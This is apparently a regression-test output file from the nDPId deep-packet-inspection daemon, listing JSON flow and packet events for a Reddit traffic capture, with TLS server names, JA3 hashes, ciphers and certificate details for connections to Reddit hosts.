-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 